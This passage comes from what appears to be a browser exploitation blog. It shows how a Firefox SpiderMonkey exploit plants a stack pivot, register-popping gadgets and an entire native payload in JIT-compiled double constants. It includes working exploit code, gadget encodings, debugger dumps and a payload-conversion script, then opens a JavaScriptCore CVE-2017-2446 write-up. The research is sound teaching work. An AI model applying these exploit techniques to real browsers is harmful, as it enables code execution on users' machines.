   +0x000 s_               : JS::Value::<unnamed-type-s_>

0:000> dt JSFunction 01b82ffb0c00
   +0x000 group_           : js::GCPtr<js::ObjectGroup *>
   +0x008 shapeOrExpando_  : 0x000001b8`2ff8c240 Void
   +0x010 slots_           : (null) 
   +0x018 elements_        : 0x00007ff7`6597d2e8 js::HeapSlot
   +0x020 nargs_           : 0
   +0x022 flags_           : 0x143
   +0x028 u                : JSFunction::U
   +0x038 atom_            : js::GCPtr<JSAtom *>

0:000> dt -r2 JSFunction::U 01b82ffb0c00+28
   +0x000 native           : JSFunction::U::<unnamed-type-native>
      +0x000 func_            : 0x000001b8`2ff8e040        bool  +1b82ff8e040
      +0x008 extra            : JSFunction::U::<unnamed-type-native>::<unnamed-type-extra>
         +0x000 jitInfo_         : 0x000001b8`2ff93420 JSJitInfo
         +0x000 asmJSFuncIndex_  : 0x000001b8`2ff93420
         +0x000 wasmJitEntry_    : 0x000001b8`2ff93420  -> 0x000003ed`90971bf0 Void

From there we can dump the JSJitInfo associated to our function to get its location in memory:

0:000> dt JSJitInfo 0x000001b8`2ff93420
   +0x000 getter           : 0x000003ed`90971bf0     bool  +3ed90971bf0
   +0x000 setter           : 0x000003ed`90971bf0     bool  +3ed90971bf0
   +0x000 method           : 0x000003ed`90971bf0     bool  +3ed90971bf0
   +0x000 staticMethod     : 0x000003ed`90971bf0     bool  +3ed90971bf0
   +0x000 ignoresReturnValueMethod : 0x000003ed`90971bf0     bool  +3ed90971bf0
   +0x008 protoID          : 0x1bf0
   +0x008 inlinableNative  : 0x1bf0 (No matching name)
   +0x00a depth            : 0x9097
   +0x00a nativeOp         : 0x9097
   +0x00c type_            : 0y1101
   +0x00c aliasSet_        : 0y1110
   +0x00c returnType_      : 0y00000011 (0x3)
   +0x00c isInfallible     : 0y0
   +0x00c isMovable        : 0y0
   +0x00c isEliminatable   : 0y0
   +0x00c isAlwaysInSlot   : 0y0
   +0x00c isLazilyCachedInSlot : 0y0
   +0x00c isTypedMethod    : 0y0
   +0x00c slotIndex        : 0y0000000000 (0)

0:000> !address 0x000003ed`90971bf0
Usage:                  <unknown>
Base Address:           000003ed`90950000
End Address:            000003ed`90980000
Region Size:            00000000`00030000 ( 192.000 kB)
Protect:                00000020          PAGE_EXECUTE_READ
Allocation Base:        000003ed`90950000
Allocation Protect:     00000001          PAGE_NOACCESS

Things are looking good: the 0x000003ed90971bf0 pointer (read out of the JSJitInfo at 0x000001b82ff93420) points into a 192kB region that was allocated as PAGE_NOACCESS but is now both executable and readable.

At this point I mainly observed things as opposed to reading a bunch of code. Even though this was probably easier, I would really like to sit down and understand it a bit more (at least more than I currently do :)). So I started dumping a lot of instructions starting at 0x000003ed90971bf0 and scrolling down with the hope of finding some of our constants in the disassembly. Not the most scientific approach, I will give you that, but look at what I eventually stumbled upon:

0:000> u 000003ed`90971c18 l200
[...]
000003ed`90972578 49bbdec0adbaefbeadde mov r11,0DEADBEEFBAADC0DEh
000003ed`90972582 4c895dc8        mov     qword ptr [rbp-38h],r11
000003ed`90972586 49bbdec0adbaefbeadde mov r11,0DEADBEEFBAADC0DEh
000003ed`90972590 4c895dc0        mov     qword ptr [rbp-40h],r11
000003ed`90972594 49bbdec0adbaefbeadde mov r11,0DEADBEEFBAADC0DEh
000003ed`9097259e 4c895db8        mov     qword ptr [rbp-48h],r11
000003ed`909725a2 49bbdec0adbaefbeadde mov r11,0DEADBEEFBAADC0DEh
000003ed`909725ac 4c895db0        mov     qword ptr [rbp-50h],r11
000003ed`909725b0 49bbdec0adbaefbeadde mov r11,0DEADBEEFBAADC0DEh
[...]

Sounds familiar, eh? These are the eight-byte constants we assigned in the JavaScript function we defined above. This is very nice because it means that we can use them to plant and manufacture smallish gadgets (remember, we have 8 bytes) in memory, at a position we can find at runtime.

Basically I need two gadgets:

  1. The stack pivot, doing something like xchg rsp, rdx / mov rsp, qword ptr [rsp] / mov rsp, qword ptr [rsp+38h] / ret,

  2. A gadget that pops four quad-words off the stack, according to the Microsoft x64 calling convention, to be able to invoke kernel32!VirtualProtect with arbitrary arguments.

The second point is very easy. The sequence pop rcx / pop rdx / pop r8 / pop r9 / ret takes 7 bytes, which perfectly fits in a double.
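Concretely, padding those seven bytes with a trailing NOP and feeding them to the b2f helper from earlier yields exactly the PopRegisters constant planted below (you can check the quad-word against the mov r11, 90C3594158415A59h in the upcoming dump):

js> b2f([0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0xc3, 0x90])
-6.380930795567661e-228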

The first one is a bit trickier, as the sequence of instructions, once assembled, takes more than a double can fit: the first three instructions alone are twelve bytes. Well, that sucks. Now, if we think about the way the JIT lays out the instructions and our constants, we can easily have a piece of code that branches onto a second one, say another constant with another eight bytes we can use. You can achieve this with a two-byte short jmp, which leaves six bytes for useful code and two bytes to jmp to the next part. With the above constraints, I decided to split the sequence in three and have the parts connected with two jumps. The first instruction, xchg rsp, rdx, needs three bytes and the second one, mov rsp, qword ptr [rsp], needs four; we do not have enough space for both in the same constant, so we pad the first constant with NOPs and place a short jmp +6 at the end. The third instruction is five bytes long, so again we cannot have the second and the third in the same constant; we pad the second one on its own and branch to the third part with another short jmp +6. The fourth instruction, ret, is only one byte, and as a result we can combine the third and the fourth in the same constant.

After this small bit of mental gymnastics, we end up with:

const BringYourOwnGadgets = function () {
    const PopRegisters = -6.380930795567661e-228;
    const Pivot0 = 2.4879826032820723e-275;
    const Pivot1 = 2.487982018260472e-275;
    const Pivot2 = -6.910095487116115e-229;
};

And let's make sure things look good in the debugger once the function is JITed:

0:000> ?? vp[2]
union JS::Value
   +0x000 asBits_          : 0xfffe01dc`e19b0680
   +0x000 asDouble_        : -1.#QNAN 
   +0x000 s_               : JS::Value::<unnamed-type-s_>

0:000> dt -r2 JSFunction::U 1dc`e19b0680+28
   +0x000 native           : JSFunction::U::<unnamed-type-native>
      +0x000 func_            : 0x000001dc`e198e040        bool  +1dce198e040
      +0x008 extra            : JSFunction::U::<unnamed-type-native>::<unnamed-type-extra>
         +0x000 jitInfo_         : 0x000001dc`e1993258 JSJitInfo
         +0x000 asmJSFuncIndex_  : 0x000001dc`e1993258
         +0x000 wasmJitEntry_    : 0x000001dc`e1993258  -> 0x0000015d`e28a1bf0 Void

0:000> dt JSJitInfo 0x000001dc`e1993258
   +0x000 getter           : 0x0000015d`e28a1bf0     bool  +15de28a1bf0
   +0x000 setter           : 0x0000015d`e28a1bf0     bool  +15de28a1bf0
   +0x000 method           : 0x0000015d`e28a1bf0     bool  +15de28a1bf0
   +0x000 staticMethod     : 0x0000015d`e28a1bf0     bool  +15de28a1bf0
   +0x000 ignoresReturnValueMethod : 0x0000015d`e28a1bf0     bool  +15de28a1bf0

0:000> u 0x0000015d`e28a1bf0 l200
[...]
0000015d`e28a2569 49bb595a41584159c390 mov r11,90C3594158415A59h
0000015d`e28a2573 4c895dc8        mov     qword ptr [rbp-38h],r11
0000015d`e28a2577 49bb4887e2909090eb06 mov r11,6EB909090E28748h
0000015d`e28a2581 4c895dc0        mov     qword ptr [rbp-40h],r11
0000015d`e28a2585 49bb488b24249090eb06 mov r11,6EB909024248B48h
0000015d`e28a258f 4c895db8        mov     qword ptr [rbp-48h],r11
0000015d`e28a2593 49bb488b642438c39090 mov r11,9090C33824648B48h
0000015d`e28a259d 4c895db0        mov     qword ptr [rbp-50h],r11

Disassembling the gadget that allows us to control the first four arguments of kernel32!VirtualProtect..:

0:000> u 0000015d`e28a2569+2
0000015d`e28a256b 59              pop     rcx
0000015d`e28a256c 5a              pop     rdx
0000015d`e28a256d 4158            pop     r8
0000015d`e28a256f 4159            pop     r9
0000015d`e28a2571 c3              ret

..and now the third-part handcrafted stack-pivot:

0:000> u 0000015d`e28a2577+2
0000015d`e28a2579 4887e2          xchg    rsp,rdx
0000015d`e28a257c 90              nop
0000015d`e28a257d 90              nop
0000015d`e28a257e 90              nop
0000015d`e28a257f eb06            jmp     0000015d`e28a2587

0:000> u 0000015d`e28a2587
0000015d`e28a2587 488b2424        mov     rsp,qword ptr [rsp]
0000015d`e28a258b 90              nop
0000015d`e28a258c 90              nop
0000015d`e28a258d eb06            jmp     0000015d`e28a2595

0:000> u 0000015d`e28a2595
0000015d`e28a2595 488b642438      mov     rsp,qword ptr [rsp+38h]
0000015d`e28a259a c3              ret

Pretty cool, uh? To be able to scan for the gadgets in memory easily, I even plant an ASCII constant I can look for. Once I find it, I know the rest of the gadgets follow six bytes after it: four bytes for the spill mov plus two bytes for the next mov r11 prefix, as the offset arithmetic below shows.
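As a sanity check, running the marker bytes through b2f gives back exactly the Magic constant planted in the function below:

js> b2f('0vercl0k'.split('').map(c => c.charCodeAt(0)))
2.1091131882779924e+208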

//
// Bring your own gadgetz boiz!
//

const Magic = '0vercl0k'.split('').map(c => c.charCodeAt(0));
const BringYourOwnGadgets = function () {

    const Magic = 2.1091131882779924e+208;
    const PopRegisters = -6.380930795567661e-228;
    const Pivot0 = 2.4879826032820723e-275;
    const Pivot1 = 2.487982018260472e-275;
    const Pivot2 = -6.910095487116115e-229;
};

//
// Force JITing of the gadgets
//

for(let Idx = 0; Idx < 12; Idx++) {
    BringYourOwnGadgets();
}

//
// Retrieve addresses of the gadgets
//

const BringYourOwnGadgetsAddress = Pwn.AddrOf(BringYourOwnGadgets);
const JsScriptAddress = Pwn.ReadPtr(
    Add(BringYourOwnGadgetsAddress, 0x30)
);

const JittedAddress = Pwn.ReadPtr(JsScriptAddress);
let JitPageStart = alignDownPage(JittedAddress);

//
// Scan the JIT page, pages by pages until finding the magic value. Our
// gadgets follow it.
//

let MagicAddress = 0;
let FoundMagic = false;
for(let PageIdx = 0; PageIdx < 3 && !FoundMagic; PageIdx++) {
    const JitPageContent = Pwn.Read(JitPageStart, 0x1000);
    for(let ContentIdx = 0; ContentIdx < JitPageContent.byteLength; ContentIdx++) {
        const Needle = JitPageContent.subarray(
            ContentIdx, ContentIdx + Magic.length
        );

        if(ArrayCmp(Needle, Magic)) {

            //
            // If we find the magic value, then we compute its address, and we getta outta here!
            //

            MagicAddress = Add(JitPageStart, ContentIdx);
            FoundMagic = true;
            break;
        }
    }

    JitPageStart = Add(JitPageStart, 0x1000);
}

const PopRcxRdxR8R9Address = Add(MagicAddress, 0x8 + 4 + 2);
const RetAddress = Add(PopRcxRdxR8R9Address, 6);
const PivotAddress = Add(PopRcxRdxR8R9Address, 0x8 + 4 + 2);

print('[+] PopRcxRdxR8R9 is @ ' + PopRcxRdxR8R9Address.toString(16));
print('[+] Pivot is @ ' + PivotAddress.toString(16));
print('[+] Ret is @ ' + RetAddress.toString(16));

This takes care of our dependency on the ntdll module, and it also puts us in the right direction for process continuation, as we could save off / restore things easily. Cherry on the cake: the mov rsp, qword ptr [rsp+38h] allows us to pivot directly into the backing buffer of a TypedArray, so we do not need to pivot twice anymore. We pivot once to our ROP chain, which invokes kernel32!VirtualProtect and dispatches execution to our native payload.

kaizen.js

Evaluation

This was pretty fun to write. A bunch of new challenges came up, some of which I did not really foresee. That is also why it is really important to actually do things: it might look easy, but you really have to put the effort in, and it keeps you honest. Especially when dealing with such big machinery, you cannot possibly predict everything, and as a result unexpected things will happen (it is guaranteed).

At this stage there are three things that I wanted to try to solve and improve:

  • The exploit still does not continue execution. The payload exits after popping the calculator as we would crash on return.
  • It targets the JavaScript shell only. All the efforts we have made to make the exploit much less dependent on this very version of js.exe should help in making the exploit work in Firefox.
  • I enjoyed playing with JIT code-reuse. Even though it is nice, I still need to dynamically resolve the address of, let's say, kernel32!VirtualProtect, which is a bit annoying. It is even more annoying because the native payload will do the same job: resolving all its dependencies at runtime. But what if we could let the payload deal with this on its own..? What if we pushed JIT code-reuse to the max and, instead of manufacturing a few gadgets, had our entire native payload incorporated in JITed constants? If we could, process continuation would probably be trivial: the payload should return and it should just work (tm).

ifrit.js

The big chunk of this exploit is the Bring Your Own Payload part. It sounded easy but turned out to be much more annoying than I thought. If we pull it off though, our exploit should be nearly the same as kaizen.js, as hijacking control-flow would be the final step.

Compiling a 64 bit version of Firefox on Windows

Before going back to debugging and haxing we need to actually compile ourselves a version of Firefox we can work on.

This was pretty easy and I did not take extensive notes about it, which suggests it all went fine (just do not forget to apply the blaze.patch to get a vulnerable xul.dll module):

$ cp browser/config/mozconfigs/win64/plain-opt mozconfig
$ mach build

If you are not feeling like building Firefox, which, clearly, I understand, I have uploaded 7z archives with the binaries I built for Windows 64-bit along with private symbols for xul.dll: ff-bin.7z.001 and ff-bin.7z.002.

Configuring Firefox for the development of ifrit

There are a bunch of settings we can turn on/off to make our lives easier (in about:config):

  1. Disable the sandbox: security.sandbox.content.level=0,
  2. Disable the multi-process mode: browser.tabs.remote.autostart=false,
  3. Disable resume from crash: browser.sessionstore.resume_from_crash=false,
  4. Disable default browser check: browser.shell.checkDefaultBrowser=false.

To debug a specific content process (with the multi-process mode enabled), you can hover the mouse over the tab and it should tell you its PID, as below:

pid.png

With those settings, it should be trivial to attach to the Firefox instance processing your content.

Force the JIT of an arbitrary native payload: Bring Your Own Payload

The first thing to do is to grab our payload and have a look at it. As we have seen earlier, we can "only" use six bytes out of the eight if we want it to branch to the next constant. Six bytes is pretty luxurious, to be honest, but at the same time a bunch of instructions generated by a regular compiler are bigger. As you can see below, there are a handful of those (not that many, though):

[...]
000001c1`1b226411 488d056b020000  lea     rax,[000001c1`1b226683]
[...]
000001c1`1b226421 488d056b020000  lea     rax,[000001c1`1b226693]
[...]
000001c1`1b22643e 488d153e020000  lea     rdx,[000001c1`1b226683]
[...]
000001c1`1b2264fb 418b842488000000 mov     eax,dword ptr [r12+88h]
[...]
000001c1`1b22660e 488da42478ffffff lea     rsp,[rsp-88h]
[...]
000001c1`1b226616 488dbd78ffffff  lea     rdi,[rbp-88h]
[...]
000001c1`1b226624 c78578ffffff68000000 mov dword ptr [rbp-88h],68h
[...]
000001c1`1b226638 4c8d9578ffffff  lea     r10,[rbp-88h]
[...]
000001c1`1b22665b 488d0521000000  lea     rax,[000001c1`1b226683]
[...]
000001c1`1b226672 488d150a000000  lea     rdx,[000001c1`1b226683]
[...]

After a while I eventually realized (too late, sigh) that the SCC-generated payload assumes the location it runs from is both writable and executable. It works fine if you run it on the stack or in the backing buffer of a TypedArray, like in basic and kaizen. From a JIT page, though, it does not, and it becomes a problem as the page is not writable for obvious security reasons.

So I dropped the previous payload and started building a new one myself. I coded it up in C in a way that makes it position-independent, with some handy scripts that my mate yrp shared with me. After hustling around with the compiler and various options, I ended up with something that is decent in size and seems to work.

Observing this payload closer, the situation looks pretty similar to the above: instructions larger than six bytes end up being a minority, fortunately. At this point, it was time to leave C land and move to assembly land. I extracted the assembly and started manually replacing all those instructions with smaller, semantically equivalent ones. That is one of those problems that is not difficult, just very annoying. This is the fixed-up assembly payload if you want to take a look at it.

Eventually, the payload was back to working correctly, but this time without instructions bigger than six bytes. We can now write JavaScript code to iterate through the assembly of the payload and pack as many instructions as possible into a constant. You can pack three 2-byte instructions in the same constant, but not one of 4 bytes and one of 3 bytes, for example; you get the idea :)
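Here is a minimal sketch of that packing logic, reusing the b2f helper from earlier. Instrs is assumed to be an array of per-instruction byte arrays (each six bytes or less, per the fix-ups above), and JmpDisp has to match the size of the JIT glue between constants (6 for the small disp8 spill encoding, 9 for the large disp32 one shown below):

function PackPayload(Instrs, JmpDisp) {
    const Constants = [];
    let Chunk = [];
    const Flush = () => {
        while(Chunk.length < 6) {
            Chunk.push(0x90);            // nop padding
        }

        Chunk.push(0xeb, JmpDisp);       // short jmp over the JIT glue
        Constants.push(b2f(Chunk));
        Chunk = [];
    };

    for(const Instr of Instrs) {
        if(Chunk.length + Instr.length > 6) {
            Flush();
        }

        Chunk.push(...Instr);
    }

    Flush();
    return Constants;
}

As a sanity check, PackPayload([[0x48, 0x87, 0xe2]], 0x6)[0] gives back exactly the Pivot0 constant (2.4879826032820723e-275) from kaizen.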

After trying out the resulting payload, I unfortunately discovered two major issues:

  • Having "padding" in between every instructions break every type of references in x64 code. rip addressing is broken, relative jumps are broken as well as relative calls. Which is actually... pretty obvious when you think about it.

  • Turns out JITing functions with a large number of constants generates bigger instructions. In the previous examples, we basically have the following pattern repeated: an eight-byte mov r11, constant followed by a four-byte mov qword ptr [rbp-offset], r11. Well, if you start to have a lot of constants in your JavaScript function, eventually the offset gets bigger (as all the doubles seem to be stored on the stack frame) and the mov qword ptr [rbp-offset], r11 instruction now gets encoded with ..seven bytes. The annoying thing is that we get a mix of both encodings throughout the JITed payload. This is a real nightmare for our payload, as we do not know how many bytes to jump forward. If we jump too far, or not far enough, we risk ending up executing the middle of an instruction, which will probably lead us to a crash.

000000bf`c2ed9b88 49bb909090909090eb09 mov r11,9EB909090909090h
000000bf`c2ed9b92 4c895db0        mov     qword ptr [rbp-50h],r11 <- small

VS

000000bf`c2ed9bc9 49bb909090909090eb09 mov r11,9EB909090909090h
000000bf`c2ed9bd3 4c899db8f5ffff  mov     qword ptr [rbp-0A48h],r11 <- big

I started by trying to tackle the second issue. I figured that if I did not have a satisfactory answer to it, I would not be able to have the references fixed up properly in the payload. To be honest, I was a bit burned out and definitely dragging my feet at this point. Was it really worth it? Probably not. But stopping would mean quitting :(. So I decided to take a small break and come back at it after a week or so. Once back at it, after observing how the baseline JIT behaved, I noticed that with an even bigger number of constants in the function I could more or less indirectly control how big the offset gets. If I make it big enough, seven bytes is enough to encode very large offsets. So I started injecting a bunch of useless constants to enlarge the stack frame and have the offsets grow and grow. Eventually, once this offset is "saturated", we get a nice stable layout like the below:

0:000> u 00000123`c34d67c1 l100
00000123`c34d67c1 49bb909090909090eb09 mov r11,9EB909090909090h
00000123`c34d67cb 4c899db0feffff  mov     qword ptr [rbp-150h],r11
00000123`c34d67d2 49bb909090909050eb09 mov r11,9EB509090909090h
00000123`c34d67dc 4c899db0ebffff  mov     qword ptr [rbp-1450h],r11
00000123`c34d67e3 49bb909090909053eb09 mov r11,9EB539090909090h
00000123`c34d67ed 4c899d00faffff  mov     qword ptr [rbp-600h],r11
00000123`c34d67f4 49bb909090909051eb09 mov r11,9EB519090909090h
00000123`c34d67fe 4c899d98fcffff  mov     qword ptr [rbp-368h],r11
00000123`c34d6805 49bb909090909052eb09 mov r11,9EB529090909090h
00000123`c34d680f 4c899d28ffffff  mov     qword ptr [rbp-0D8h],r11
00000123`c34d6816 49bb909090909055eb09 mov r11,9EB559090909090h
00000123`c34d6820 4c899d00ebffff  mov     qword ptr [rbp-1500h],r11
00000123`c34d6827 49bb909090909056eb09 mov r11,9EB569090909090h
00000123`c34d6831 4c899db0edffff  mov     qword ptr [rbp-1250h],r11
00000123`c34d6838 49bb909090909057eb09 mov r11,9EB579090909090h
00000123`c34d6842 4c899d30f6ffff  mov     qword ptr [rbp-9D0h],r11
00000123`c34d6849 49bb909090904150eb09 mov r11,9EB504190909090h
00000123`c34d6853 4c899d90f2ffff  mov     qword ptr [rbp-0D70h],r11
00000123`c34d685a 49bb909090904151eb09 mov r11,9EB514190909090h
00000123`c34d6864 4c899dd8f8ffff  mov     qword ptr [rbp-728h],r11
00000123`c34d686b 49bb909090904152eb09 mov r11,9EB524190909090h
00000123`c34d6875 4c899dc0f7ffff  mov     qword ptr [rbp-840h],r11
00000123`c34d687c 49bb909090904153eb09 mov r11,9EB534190909090h
00000123`c34d6886 4c899db0fbffff  mov     qword ptr [rbp-450h],r11
00000123`c34d688d 49bb909090904154eb09 mov r11,9EB544190909090h
00000123`c34d6897 4c899d48eeffff  mov     qword ptr [rbp-11B8h],r11
00000123`c34d689e 49bb909090904155eb09 mov r11,9EB554190909090h
00000123`c34d68a8 4c899d68fbffff  mov     qword ptr [rbp-498h],r11
00000123`c34d68af 49bb909090904156eb09 mov r11,9EB564190909090h
00000123`c34d68b9 4c899d48f4ffff  mov     qword ptr [rbp-0BB8h],r11
00000123`c34d68c0 49bb909090904157eb09 mov r11,9EB574190909090h
00000123`c34d68ca 4c895da0        mov     qword ptr [rbp-60h],r11 <- NOOOOOO
00000123`c34d68ce 49bb9090904989e3eb09 mov r11,9EBE38949909090h
00000123`c34d68d8 4c899d08eeffff  mov     qword ptr [rbp-11F8h],r11

Well, close to perfect. Even though I tried a bunch of things, I do not think I ever ended up with a fully clean layout (I ended up appending about seventy doubles). I also do not know the reason why, as this is only based on observation. But if you think about it, we can potentially tolerate a few "mistakes": we do not use rip addressing, and the NOP sled prior to each instruction can absorb some of them.

For the first part of the problem, I basically inject a number of NOP instructions in between instructions. I thought I would just throw this into ml64.exe, have it figure out the references for me, and call it a day. Unfortunately, there are a number of annoyances that made me move away from this solution. Here are a few I can remember off the top of my head:

  • As you have to know precisely the number of NOPs to inject to simulate the "JIT environment", you also need to know the size of the instruction you want to plant. The issue is that when you are inflating the payload with NOPs in between every instruction, some instructions get encoded differently. Imagine a short jump encoded in two bytes.. well, it might become a long jump encoded with four bytes. And when that happens, it messes up everything.

  • Sort of as a follow-up to the above point, I figured I would try to force MASM64 to always generate long jumps instead of short jumps. Turns out I did not find a way to do that, which was annoying.
  • My initial workflow was: dump the assembly with WinDbg, send it to a Python script that generates a .asm file, and compile that with ml64. Something to keep in mind is that, in x86, one instruction can have several different encodings, with different sizes. So again, I encountered the same class of problem as above: ml64 would encode the disassembled instruction a bit differently, and kaboom.

In the end I figured it was enough bullshit and I would just implement it myself to control my own destiny. Not something pretty, but something that works. I have a Python script that works in several passes. The input to the script is just the WinDbg disassembly of the payload I want to JITify; every line has the address of the instruction, the encoded bytes and the disassembly.

payload = '''00007ff6`6ede1021 50              push    rax
00007ff6`6ede1022 53              push    rbx
00007ff6`6ede1023 51              push    rcx
00007ff6`6ede1024 52              push    rdx
# [...]
'''

Let's walk through payload2jit.py:

  1. First step is to normalize the textual version of the payload. Obviously, we do not want to deal with text, so we extract the addresses (useful for labelization), the encoding (to calculate the number of NOPs to inject) and the disassembly (used for re-assembling). An example output is available here: _p0.asm.
  2. Second step is labelization of our payload. We iterate through every line and we replace absolute addresses by labels. This is required so that we can have keystone re-assemble the payload and take care of references later. An example output is available in _p1.asm.
  3. At this stage, we enter the iterative process. The goal is to assemble the payload and compare it to the previous iteration. If we find variance between the encodings of the same instruction, we have to re-adjust the number of NOPs injected: if the encoding is larger, we remove NOPs; if it is smaller, we add NOPs. We repeat this stage until the assembled payload converges to no change (see the sketch after this list). Two generations are needed to reach stabilization for our payload: _p2.asm / _p2.bin and _p3.asm / _p3.bin.
  4. Once we have an assembled payload, we generate a JavaScript file and invoke an interpreter to have it generate the byop.js file which is full of the constants encoding our final payload.
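Step 3's fixed-point idea is simple enough to sketch in a few lines. Below is a toy model where each pass only compares per-instruction encoding sizes; the real script re-assembles everything with keystone between passes, so treat this as the idea rather than the implementation:

// Toy model of the convergence pass: given the per-instruction encoding
// sizes of two successive assembly passes, compute how many NOPs to add
// (positive) or remove (negative) in front of each instruction.
function NopAdjustments(PreviousSizes, CurrentSizes) {
    return CurrentSizes.map(
        (Size, Idx) => PreviousSizes[Idx] - Size
    );
}

// A short je (2 bytes) re-encoded as a long one (6 bytes) means four NOPs
// worth of padding have to disappear in front of the next instruction.
NopAdjustments([2, 1], [6, 1]); // [-4, 0]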

This is what the script yields on stdout (some of the short jump instructions need a larger encoding because the payload inflates):

(C:\ProgramData\Anaconda2) c:\work\codes\blazefox\scripts>python payload2jit.py
[+] Extracted the original payload, 434 bytes (see _p0.asm)
[+] Replaced absolute references by labels (see _p1.asm)
[+] #1 Assembled payload, 2513 bytes, 2200 instructions (_p2.asm/.bin)
  > je 0x3b1 has been encoded with a larger size instr 2 VS 6
  > je 0x3b1 has been encoded with a larger size instr 2 VS 6
  > je 0x53b has been encoded with a larger size instr 2 VS 6
  > jne 0x273 has been encoded with a larger size instr 2 VS 6
  > je 0x3f7 has been encoded with a larger size instr 2 VS 6
  > je 0x3f7 has been encoded with a larger size instr 2 VS 6
  > je 0x3f7 has been encoded with a larger size instr 2 VS 6
  > je 0x816 has been encoded with a larger size instr 2 VS 6
  > jb 0x6be has been encoded with a larger size instr 2 VS 6
[+] #2 Assembled payload, 2477 bytes, 2164 instructions (_p3.asm/.bin)
[*] Generating bring_your_own_payload.js..
[*] Spawning js.exe..
[*] Outputting byop.js..

And finally, after a lot of dead ends, hacky scripts, countless hours of debugging and a fair amount of frustration... the moment we have all been waiting for \o/:

ifrit.js

Evaluation

This exploit turned out to be a bit more annoying than I anticipated. In the end it is nice because we just have to hijack control-flow and we get arbitrary native code execution, without ROP. Now, there are still a bunch of things I would have liked to investigate (some of them I might soon):

  • It would be cool to build an actually useful payload: something that injects arbitrary JavaScript into every tab, or enables a UXSS condition of some sort. We might even be able to pull that off by just corrupting a few key structures (a la GodMode / SafeMode back in the Internet Explorer days).
  • It would also be interesting to test this BYOP thingy on various versions of Firefox and see if it actually is reliable (and to quantify it). If it is, then I would be curious to test its limits: bigger payloads, better tooling for "transforming" an arbitrary payload into something that is JITable, etc.
  • Another interesting avenue would be to evaluate how annoying it is to get native code-execution without hijacking an indirect call (assuming Firefox enables some sort of software CFI solution).
  • I am also sure there are a bunch of fun tricks to be found in both the baseline JIT and IonMonkey that could be helpful to develop techniques, primitives, and utilities.
  • WebAssembly and the JIT should probably open other interesting avenues for exploitation. [edit] Well, this is pretty fun, because while finishing up the article I noticed the cool work of @rh0_gz, who seems to have developed a very similar technique using the WASM JIT; go check it out: More on ASM.JS Payloads and Exploitation.
  • The last thing I would like to try is to play with pwn.js.

Conclusion

Hopefully you are not asleep and you made it all the way down here :). Thanks for reading, and hopefully you both enjoyed the ride and learned a thing or two.

If you would like to play at home and re-create what I described above, I uploaded everything needed to the blazefox GitHub repository, as mentioned above. No excuse not to play at home :).

I would love to hear feedback / ideas so feel free to ping me on twitter at @0vercl0k, or find me on IRC or something.

Last but not least, I would like to thank my mates yrp604 and __x86 for proofreading, edits and all the feedback :).

Bunch of useful and less useful links (some I already pasted above):

CVE-2017-2446 or JSC::JSGlobalObject::isHavingABadTime.

By: yrp
15 July 2018 at 01:49

Introduction

This post will cover the development of an exploit for JavaScriptCore (JSC) from the perspective of someone with no background in browser exploitation.

Around the start of the year, I was pretty burnt out on CTF problems and was interested in writing an exploit for something more complicated and practical. I settled on writing a WebKit exploit for a few reasons:

  • It is code that is broadly used in the real world
  • Browsers seemed like a cool target in an area where I had little familiarity (both C++ and interpreter exploitation).
  • WebKit is (supposedly) the softest of the major browser targets.
  • There were good existing resources on WebKit exploitation, namely saelo’s Phrack article, as well as a variety of public console exploits.

With this in mind, I got a recommendation for an interesting looking bug that had not previously been publicly exploited: @natashenka’s CVE-2017-2446 from the Project Zero bugtracker. The bug report had a PoC which crashed in memcpy() with some partially controlled registers, which is always a promising start.

This post assumes you’ve read saelo’s Phrack article linked above, particularly the portions on NaN boxing and butterflies -- I can’t do a better job of explaining these concepts than the article. Additionally, you should be able to run a browser/JavaScript engine in a debugger -- we will target Linux for this post, but the concepts should translate to your preferred platform/debugger.

Finally, the goal of doing this initially, and now of writing it up, was and is to learn as much as possible. There is clearly a lot more for me to learn in this area, so if you read something that is incorrect, inefficient, unstable, a bad idea, or just have some thoughts to share, I’d love to hear from you.

Target Setup and Tooling

First, we need a vulnerable version of WebKit. e72e58665d57523f6792ad3479613935ecf9a5e0 is the hash of the last vulnerable version (the fix is in f7303f96833aa65a9eec5643dba39cede8d01144) so we check out and build off this.

To stay in more familiar territory, I decided to only target the jsc binary, not WebKit browser as a whole. jsc is a thin command line wrapper around libJavaScriptCore, the library WebKit uses for its JavaScript engine. This means any exploit for jsc, with some modification, should also work in WebKit. I’m not sure if this was a good idea in retrospect -- it had the benefit of resulting in a stable heap as well as reducing the amount of code I had to read and understand, but had fewer codepaths and objects available for the exploit.

I decided to target WebKit on Linux instead of macOS mainly due to debugger familiarity (gdb + gef). For code browsing, I ended up using vim and rtags, which was… okay. If you have suggestions for C++ code auditing, I’d like to hear them.

Target modifications

I found that I frequently wanted to breakpoint in my scripts to examine the interpreter state. After screwing around with this for a while I eventually just added a dbg() function to jsc. This would allow me to write code like:

dbg(); // examine the memory layout
foo(); // do something
dbg(); //see how things have changed

The patch to add dbg() to jsc is pretty straightforward.

diff --git a/Source/JavaScriptCore/jsc.cpp b/Source/JavaScriptCore/jsc.cpp
index bda9a09d0d2..d359518b9b6 100644
--- a/Source/JavaScriptCore/jsc.cpp
+++ b/Source/JavaScriptCore/jsc.cpp
@@ -994,6 +994,7 @@ static EncodedJSValue JSC_HOST_CALL functionSetHiddenValue(ExecState*);
 static EncodedJSValue JSC_HOST_CALL functionPrintStdOut(ExecState*);
 static EncodedJSValue JSC_HOST_CALL functionPrintStdErr(ExecState*);
 static EncodedJSValue JSC_HOST_CALL functionDebug(ExecState*);
+static EncodedJSValue JSC_HOST_CALL functionDbg(ExecState*);
 static EncodedJSValue JSC_HOST_CALL functionDescribe(ExecState*);
 static EncodedJSValue JSC_HOST_CALL functionDescribeArray(ExecState*);
 static EncodedJSValue JSC_HOST_CALL functionSleepSeconds(ExecState*);
@@ -1218,6 +1219,7 @@ protected:

         addFunction(vm, "debug", functionDebug, 1);
         addFunction(vm, "describe", functionDescribe, 1);
+        addFunction(vm, "dbg", functionDbg, 0);
         addFunction(vm, "describeArray", functionDescribeArray, 1);
         addFunction(vm, "print", functionPrintStdOut, 1);
         addFunction(vm, "printErr", functionPrintStdErr, 1);
@@ -1752,6 +1754,13 @@ EncodedJSValue JSC_HOST_CALL functionDebug(ExecState* exec)
     return JSValue::encode(jsUndefined());
 }

+EncodedJSValue JSC_HOST_CALL functionDbg(ExecState* exec)
+{
+       asm("int3;");
+
+       return JSValue::encode(jsUndefined());
+}
+
 EncodedJSValue JSC_HOST_CALL functionDescribe(ExecState* exec)
 {
     if (exec->argumentCount() < 1)

Other useful jsc features

